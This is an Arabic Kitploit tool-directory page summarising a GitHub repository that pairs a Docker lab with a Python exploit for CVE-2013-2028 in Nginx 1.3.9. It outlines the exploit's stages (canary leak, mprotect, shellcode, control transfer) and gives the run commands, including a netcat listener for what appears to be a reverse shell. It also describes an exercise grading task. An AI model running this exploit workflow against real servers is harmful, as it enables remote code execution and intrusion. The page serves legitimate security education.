Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2013-2028-Exploit — مختبر قائم على Docker واستغلال بلغة Python للثغرة CVE-2013-2028، وهي تجاوز صحيح في محلّل الأجزاء المجزّأة في Nginx 1.3.9، ويغطي استرداد الكناري، وmprotect، وتنفيذ shellcode. | Kitploit
أدوات/GitHubGitHub/vanivamshi/cve-2013-2028-exploit
تحليل الثغرات الأمنيةالاستغلالشيل كودالمحاكاة الافتراضية للأماناختبار الاختراقالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubvanivamshi/cve-2013-2028-exploit

CVE-2013-2028-Exploit

مختبر قائم على Docker واستغلال بلغة Python للثغرة CVE-2013-2028، وهي تجاوز صحيح في محلّل الأجزاء المجزّأة في Nginx 1.3.9، ويغطي استرداد الكناري، وmprotect، وتنفيذ shellcode.

عرض المستودع
منذ 7س 56دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2013-2028

تفاصيل الثغرة

البرنامج المصاب: Nginx 1.3.9

الدالة المصابة: ngx_http_parse_chunked

CVE-2013-2028 هي ثغرة تجاوز سعة عدد صحيح (integer overflow) في محلل ترميز نقل HTTP المجزأ (chunked transfer encoding) في Nginx. في الظروف التي تستهدفها بيئة المختبر هذه، يمكن أن تؤدي الثغرة إلى إفساد الذاكرة ويمكن استخدامها للتأثير على مسار التحكم.

يوفر هذا المستودع بيئة معزولة قائمة على Docker لدراسة الثغرة وإعادة إنتاج سير عمل الاستغلال.

تفاصيل الاستغلال

يتكون الاستغلال الكامل من أربع مراحل رئيسية:

  1. استعادة stack canary

    استعادة stack canary من خلال الفحص بايتًا بايتًا.

  2. التلاعب بحماية الذاكرة

    حساب معلومات العنوان ذات الصلة وبناء تسلسل مسار التحكم المطلوب لاستدعاء mprotect على منطقة الذاكرة المتحكم بها.

  3. وضع shellcode

    نسخ الحمولة (payload) إلى منطقة الذاكرة المتحكم بها.

  4. نقل مسار التحكم

    نقل التنفيذ إلى منطقة الذاكرة المتحكم بها.

يوضح الاستغلال الكامل التدرج من إطلاق المحلل المصاب عبر إفساد الذاكرة والتلاعب بمسار التحكم إلى تنفيذ الكود المتحكم به.

المتطلبات

  • Docker
  • Docker Compose
  • Python 3
  • تبعيات Python المطلوبة بواسطة exploit.py
  • netcat للمستمع (listener) المستخدم في المختبر الكامل

كيفية إعادة الإنتاج

1. بدء المستمع

على نظام المضيف، ابدأ مستمعًا على المنفذ المُهيأ:

root@kitploit:~
nc -lvp 4345

استخدم نفس المنفذ مع الوسيط --listenerport (-lp) عند تشغيل الاستغلال.

2. بدء حاوية Nginx المصابة

قم ببناء وبدء بيئة Docker:

root@kitploit:~
sudo docker-compose up --build

يشغّل الهدف المصاب Nginx 1.3.9 داخل الحاوية.

يمكنك التحقق من إصدار Nginx باستخدام:

root@kitploit:~
docker-compose exec cve-2013-2028 /usr/local/nginx/sbin/nginx -v

3. تشغيل الاستغلال الكامل

شغّل:

root@kitploit:~
python3 exploit.py \
    -ra 127.0.0.1 \
    -rp 8081 \
    -la <listener-machine-address> \
    -lp <listener-machine-port>

ينفذ الاستغلال مراحل استعادة canary وبناء الحمولة قبل إرسال الحمولة النهائية إلى الهدف المصاب.

إذا كان هناك canary مستعاد مسبقًا متاحًا، فيمكن توفيره باستخدام:

root@kitploit:~
python3 exploit.py \
    -ra 127.0.0.1 \
    -rp 8081 \
    -la <listener-machine-address> \
    -lp <listener-machine-port> \
    -c '<canary>'

4. المهمة الوسيطة

يوفر المستودع أيضًا مهمة وسيطة لتقييم التقدم خلال سير عمل بحث الثغرة.

شغّل:

root@kitploit:~
python3 intermediate_task.py \
    -ra 127.0.0.1 \
    -rp 8081 \
    -la <listener-machine-address> \
    -lp <listener-machine-port>

تنفذ المهمة الوسيطة فحوصاتها مباشرةً مقابل هدف Docker قيد التشغيل. وهي لا تعتمد على ملفات أدلة مُنشأة يدويًا أو تأكيدات JSON مُقدمة يدويًا.

تتحقق المهمة من مجالين:

تحديد الثغرة

المهمة:

  • تؤكد أن حاوية الهدف قيد التشغيل.
  • تكتشف إصدار Nginx المثبت.
  • تحدد ما إذا كان الإصدار المكتشف يتوافق مع إصدار Nginx المصاب المستخدم في المختبر.

التحقق من التهيئة

المهمة:

  • تؤكد أن حاوية Docker قيد التشغيل.
  • تؤكد أن Nginx قيد التشغيل.
  • تتحقق من صحة تهيئة Nginx باستخدام nginx -t.

يثبت فحص التهيئة أن تهيئة Nginx صحيحة نحويًا. ولا ينبغي تفسيره بحد ذاته كدليل على تخفيف CVE-2013-2028.

مثال على المخرجات:

root@kitploit:~
============================================================
CVE-2013-2028 INTERMEDIATE TASK
============================================================

Target:
  nginx running:        True
  nginx version:        1.3.9
  vulnerable build:     True

Progress:
  [x] vulnerability_identified
  [x] configuration_validated

All required checks completed.
Exercise complete.

تخزّن المهمة الوسيطة نتائج فحوصات وقت التشغيل هذه في:

root@kitploit:~
grader_state.json

يُستخدم هذا الملف فقط للحفاظ على الحالة الناتجة عن الفحوصات. وهو ليس مصدر تحديد الثغرة.

هدف Docker

تستخدم بيئة المختبر عمدًا Nginx 1.3.9، وهو إصدار قديم من Nginx متأثر بـ CVE-2013-2028.

توفر بيئة Docker هدفًا معزولًا لبحوث الثغرات وتمارين الاستغلال. يجب الوصول إلى الخدمة المصابة فقط عبر الواجهات المكشوفة بواسطة تهيئة المختبر.

إخلاء المسؤولية

هذا المستودع مخصص فقط للأغراض التعليمية وأغراض بحوث الأمن المصرح بها في بيئة مختبر معزولة.

لا تشغّل الاستغلال ضد أنظمة لا تملكها أو لا تملك تفويضًا صريحًا لاختبارها.

تنزيل الأداة